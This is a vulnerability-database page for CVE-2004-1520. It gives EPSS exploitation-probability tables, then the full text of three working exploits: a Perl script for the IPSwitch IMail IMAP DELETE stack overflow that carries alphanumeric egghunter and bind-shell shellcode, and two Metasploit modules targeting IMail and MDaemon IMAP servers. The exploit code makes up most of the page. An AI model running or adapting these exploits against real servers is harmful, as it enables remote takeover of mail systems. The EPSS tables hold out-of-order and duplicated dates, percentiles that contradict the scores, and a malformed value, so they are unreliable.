CVE-2004-1520 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	85.52%	–	–
2023-03-12	–	–	–	96.77%	–
2023-06-11	–	–	–	96.88%	–
2024-01-28	–	–	–	95.87%	–
2024-06-02	–	–	–	95.87%	–
2024-09-01	–	–	–	96.29%	–
2024-12-22	–	–	–	96.02%	–
2025-03-09	–	–	–	95.62%	–
2025-01-19	–	–	–	96.02%	–
2025-03-09	–	–	–	95.62%	–
2025-03-18	–	–	–	–	90.98%
2025-03-30	–	–	–	–	89.37%
2025-03-30	–	–	–	–	89.37,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-06-11	1%
2024-01-28	99%
2024-06-02	99%
2024-09-01	1%
2024-12-22	1%
2025-03-09	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	1%
2025-03-30	1%
2025-03-30	1%

#!/usr/bin/perl -w ################################### # # IPSwitch-IMail-8.13-DELETE # # Discovered by : Muts # Coded by : Zatlander # WWW.WHITEHAT.CO.IL # ################################## # # Plain vanilla stack overflow in the DELETE command # Restrictions: # - Need valid authentication credentials # - Input buffer only allows characters between x20 -> x7e # # Credits: # - http://www.metasploit.org - HD Moore for the metasploit shellcode # - http://www.edup.tudelft.nl/~bjwever/menu.html - skylined for the ALPHA ascii shellcode generator # - http://www.hick.org - for the syscall egghunt code in the paper "Understanding Windows Shellcode" # ################################## use IO::Socket; use Getopt::Std; use Mail::IMAPClient; print "Exploit for the IPSwitch IMail DELETE buffer overflow\n"; print "C0d3d by Zatlander\n"; print "Discovered by Muts\n"; print "WWW.WHITEHAT.CO.IL\n"; print "For hacking purposes only!!!\n\n"; # Find shellcode with signature "w00tw00t"; start from esp # from 0 -> $egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH2a3PLMvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA"; $egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PLMtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA"; # Real shellcode: bind shell on port 4444 ( ./alpha edx < shellcode.bin ) $shellcode = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGnkbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvahGZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oRuFLniYWuaYKScpSe86bC07a3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGyjDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJKOKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA"; getopts("h:u:p:", \%args); if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) { print "Usage: $0 -h [host] -u [username] -p [password]\n"; exit;} $usr = $args{u}; $pwd = $args{p}; $host = $args{h}; # jb +20; jnb +20 -> jump over return address (0x21 is first ascii safe offset) $jmp21 = "r!s!"; # 0x6921526A -> pointer to "CALL [EDX+8]" ends up in return address ########################################################################## # This should hopefully be the only version dependent variable here. # Find an ASCII safe address pointing to a CALL [EDX+8] for your OS ########################################################################## $calledx8 = "jR!i"; # aAA aligns ESP with the egghunter shellcode (popad, pop, pop) $asciieh = "aAA" . $egghunter; $asciisc = "w00tw00t" . $shellcode; $email = "From: \"The guy hacking you\" <a\@b.com>\r\n" . "To: \"Poor You\" <b\@c.com>\r\n" . "Subject: $asciisc\r\n" . "Date: Wed, 3 Nov 2004 14:45:11 +0100\r\n" . "Message-ID: <000101c4c1acdcndj6d69b90$5e01a8c0\@snorlax>\r\n" . "Content-Type: text/plain;\r\n\tcharset=\"us-ascii\"\r\n" . "Content-Transfer-Encoding: 7bit\r\n" . "\r\n" . $asciisc; $payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "\r\n"; print "Login in to $host as $usr/$pwd\n"; my $imap = Mail::IMAPClient->new( Server => $host, User => $usr, Password=> $pwd) or die "Cannot connect: $@"; print "count: " . $imap->message_count("Inbox") . "\n"; print "Sending EGG\n"; $imap->select("Inbox") or die "Could not select: $@\n"; my $uid = $imap->append( "Inbox", $email ) or die "Cannot append: $@"; $msg = $imap->message_string($uid) or die "Cannot get message: $@"; #$msg = $imap->body_string($uid) or die "Cannot get message: $@"; #print "retrieving $uid back: $msg\n"; print "Overflowing DELETE\n"; $imap->delete($payload) or die "Cannot delete: $@n"; print("Finished...\n"); # milw0rm.com [2004-11-12]

## # $Id: imail_delete.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) super(update_info(info, 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 614, 'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric), 'StackAdjustment' => -3500, 'EncoderOptions' => { 'BufferRegister' => 'EDX', } }, 'Platform' => 'win', 'Targets' => [ # alphanum rets :(, will look more into it later ['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }], ], 'DisclosureDate' => 'Nov 12 2004', 'DefaultTarget' => 0)) end def exploit connect_login print_status("Sending overflow string...") req = 'A683 DELETE ' req << payload.encoded # Jump over code req << "\x74\x32\x75\x30" req << [target.ret].pack('V') req << rand_text_alphanumeric(44) # GetEIP code req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59" req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59" # Alphanumeric jmp back (edx context) req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41" req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50" req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57" req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a" # Run off the stack, so we don't kill our payload, or something... req << rand_text_alphanumeric(600) # Terminate the request req << "\r\n" sock.put(req) handler disconnect end end

## # $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) super(update_info(info, 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', 'Description' => %q{ This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts. }, 'Author' => [ 'anonymous' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 9583 $', 'References' => [ [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], ], 'DisclosureDate' => 'Nov 12 2004', 'DefaultTarget' => 0)) end def exploit connect print_status("Asking for CRAM-MD5 authentication...") sock.put("a001 authenticate cram-md5\r\n") res = sock.get_once print_status("Received CRAM-MD5 answer: #{res.chomp}") # Magic no return-address exploitation ninjaness! buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" req = Rex::Text.encode_base64(buf) + "\r\n" sock.put(req) res = sock.get_once print_status("Received authentication reply: #{res.chomp}") print_status("Sending LOGOUT to close the thread and trigger an exception") sock.put("a002 LOGOUT\r\n") res = sock.get_once print_status("Received LOGOUT reply: #{res.chomp}") select(nil,nil,nil,1) handler disconnect end end